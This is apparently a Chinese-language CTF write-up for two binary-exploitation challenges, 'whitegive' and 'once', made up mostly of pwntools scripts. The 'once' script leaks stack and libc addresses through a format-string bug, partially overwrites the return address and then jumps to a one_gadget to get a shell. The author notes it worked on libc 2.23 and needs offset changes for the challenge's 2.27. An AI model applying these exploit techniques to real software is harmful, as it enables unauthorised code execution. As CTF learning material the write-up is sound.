没怎么做,就写了两题,另外两道没怎么看官方已经给出了writeup,不过第一周上的这些题感觉要把新手们劝退了。。。。。。。。。
whitegive
签到题直接调试看以下寄存器情况就知道了
from pwn import *
from LibcSearcher import*
context.log_level='debug'
pe='./whitegive'
ip,port = '182.92.108.71',30210
elf=ELF(pe)
if args['REMOTE']:
p = remote(ip,port)
else:
p = process(pe)
def get_one():
if(arch == '64'):
if(version == '2.23'):
one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
if (version == '2.27'):
one = [0x4f365, 0x4f3c2, 0x10a45c]
return one
def main():
p.recvuntil('password:')
payload='4202514'
success('payload = ' + payload)
p.sendline(payload)
p.interactive()
if __name__ == '__main__':
main()
|
once
用libc-2.23的环境打通的,题目是2.27的,一些偏移需要调。
from pwn import *
from LibcSearcher import*
context.log_level='debug'
pe='./once'
libc_23='/lib/x86_64-linux-gnu/libc.so.6'
libc_27='./libc-2.27.so'
ip,port = '182.92.108.71',30210
elf=ELF(pe)
libc=ELF(libc_23)
if args['REMOTE']:
p = remote(ip,port)
else:
p = process(pe)
def get_one():
if(arch == '64'):
if(version == '2.23'):
one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
if (version == '2.27'):
one = [0x4f3d5, 0x4f432, 0x10a41c]
return one
def main():
pop_ret= 0x0000000000001283
start=0x00000000000011D2
p.recvuntil('It is your turn: ')
payload='%11$p'+'%13$p'+'\x00'*30+'\xD2\x11'
p.send(payload)
vuln=int(p.recv(14),16)
print(type(vuln))
libc_start_main_addr=int(p.recv(14),16)-240
print(type(libc_start_main_addr))
success('vuln = ' + hex(vuln))
success("libc_start_main = "+ hex(libc_start_main_addr))
bin_sh_libc=next(libc.search("/bin/sh"))
system_libc=libc.symbols['system']
libc_start_main_libc=libc.symbols['__libc_start_main']
offset=int(libc_start_main_addr)-libc_start_main_libc
system_addr=system_libc+offset
bin_addr=bin_sh_libc+offset
success('offset: ' + hex(offset))
success("system: " + hex(system_addr))
success("bin_addr: " + hex(bin_addr))
p.recvuntil('turn: ')
pop=vuln+177
payload1='\x00'*0x28+p64(offset+0x45226)
p.sendline(payload1)
p.interactive()
if __name__ == '__main__':
main()
|
